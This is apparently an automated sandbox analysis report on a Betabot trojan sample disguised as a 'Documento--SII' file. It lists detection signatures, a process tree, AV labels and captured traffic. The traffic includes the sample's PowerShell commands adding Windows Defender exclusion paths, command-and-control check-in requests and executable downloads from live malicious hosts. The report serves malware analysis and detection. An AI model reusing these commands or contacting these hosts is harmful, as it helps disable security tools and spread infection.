
Analysis Report Documento--SII--33875.bin

Overview

General Information

Sample Name: Documento--SII--33875.bin (renamed file extension from bin to exe)
Analysis ID: 366082
MD5: 2ced2c14eece71c72c5e45e8a607bb4c
SHA1: 13a700a297a7e5697d69bb743c3b256ac10a14e2
SHA256: 4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e

Detection

Betabot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Betabot
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Internet Explorer zone settings
Overwrites Windows DLL code with PUSH RET codes
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Changes image file execution options
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Disables exception chain validation (SEHOP)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

Process tree:
  • System is w10x64
  • Documento--SII--33875.exe (PID: 5464 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • Documento--SII--33875.exe (PID: 4948 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
      • explorer.exe (PID: 3696 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • iom7q73oi.exe (PID: 6152 cmdline: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe MD5: 08CDFD0D3A406601C42F087DA16EC6C8)
          • powershell.exe (PID: 5840 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\' MD5: 95000560239032BC68B4C2FDFCDEF913)
          • powershell.exe (PID: 4540 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\' MD5: 95000560239032BC68B4C2FDFCDEF913)
  • 9sek3aw7533q9.exe (PID: 736 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 6208 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 6576 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 6616 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 6276 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 5704 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 5236 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • cleanup

Malware Configuration

No configs have been found

Source | Rule | Description | Author | Strings
00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
(24 entries in total; remaining entries not shown)

Source | Rule | Description | Author | Strings
5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
3.2.explorer.exe.2a00000.3.raw.unpack | JoeSecurity_Betabot | Yara detected Betabot | Joe Security |
(12 entries in total; remaining entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://l0ioz.icu/pub/bin.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Avira: detection malicious, Label: TR/Spy.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe | ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe | ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: Documento--SII--33875.exe | Virustotal: Detection: 49%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Documento--SII--33875.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.1.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 2.1.Documento--SII--33875.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 3.2.explorer.exe.6870000.6.unpack | Avira: Label: TR/Dropper.Gen
Source: 33.2.9sek3aw7533q9_1.exe.11d0000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.Documento--SII--33875.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 31.2.9sek3aw7533q9.exe.1180000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.Documento--SII--33875.exe.11c0000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 34.2.iom7q73oi.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen
Source: 32.2.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 32.1.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 19.2.9sek3aw7533q9.exe.11e0000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.1.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 21.2.9sek3aw7533q9.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 34.0.iom7q73oi.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen
Source: 11.2.9sek3aw7533q9.exe.12e0000.1.unpack | Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack
Source: Documento--SII--33875.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source: Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49715 -> 212.114.52.43:80
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.5:49716 -> 104.21.55.228:80
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 10 Mar 2021 10:42:34 GMTServer: ApacheLast-Modified: Wed, 10 Mar 2021 05:36:15 GMTAccept-Ranges: bytesContent-Length: 680448Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: global traffic | HTTP traffic detected:
    POST /forum/logout.php?page=7 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: rusianlover.icu
    Content-Length: 1081
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: zakriasons.co
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /forum/logout.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: rusianlover.icu
    Content-Length: 4727
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /old/GetDataAVK.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: estrelladamm.icu
    Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 
33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30 Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez=099F560D35AC48DF4F6B9DF8D8EE3D08EBADE4A6BEAE722897720E3C08F164187CB8D495B4C12424570E43CE48661BE80997F0BF112222A2AE2606BB49D16D528A4B5E07673CD34C72BC7E30F9349D562BBA56A0E4E552BD579AFE007F39E4EF499E4BAA0AF9D337E54A2FAD43850319BF41DB37247EF8A2564A6A42BF8892D43B3AA00227DCA0B5BF0B99594FFFA74D4C9848E63A69EFF392FDBC1983E9100F93F56D775083A269DD9CF36DDD386B06F4E7789974E0210EC862D67E310D6BFF2C698CF96AF2E22A6F5B17069A905DC47A8E694BEAF7158E52E27D70AAA8B7A1FB2D9FC8E7F5DC2B13E6A93E396E7BB5C7DE88981855E6EDA37C446A47E740EAF3AE2F3C0CB281032BCA00E0E792E5FE313F192E74699079A6F5CCE2DCF3C14FE8C4D510
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 693Cache-Control: no-cacheData Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 
64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30 Data Ascii: mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=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
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=1809723 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 664Cache-Control: no-cacheData Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 
37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 44 41 46 43 36 46 31 32 31 35 31 42 30 36 Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij=A5E848D8BAECF742676E54D5D697FA6CF47BA7B18A85CE5722EBC2A15A1E6C0ED19973F909789D216255CE3B00BFAC3CEFF650F9D48BEFC60BCED3554D269CBF1A366263407BD4A11AB51703CEBF51BFBFE67BBBB6F918DB9FE1D945951B5DE5293F816726A1B269F1C8AD0ACAB544CED456C1A76B4F1FD9F8FCD1AEE8A864C766160B7CCF90D8A326801991BD3F08F04712A1C0F3734342B2C617D573ADA15BF1B40EE8E80D2B4A2DA898FAB65ADC9AA68A94A9213A2FCE65F6977EB38AAEA400E646058A9D97940E42F9C02D5E0835DFFF74889B476CC46E4E3618E7087E85DD99D361F9E494BF08B19B862BBFEACBEEE7A8E6AC60490519E4301801310CB313C26B6F36F817D540FA2564751F0E3DFC2F59ED1857CEF8E2D2DB6FC9DAFC6F12151B06
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?page=83 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 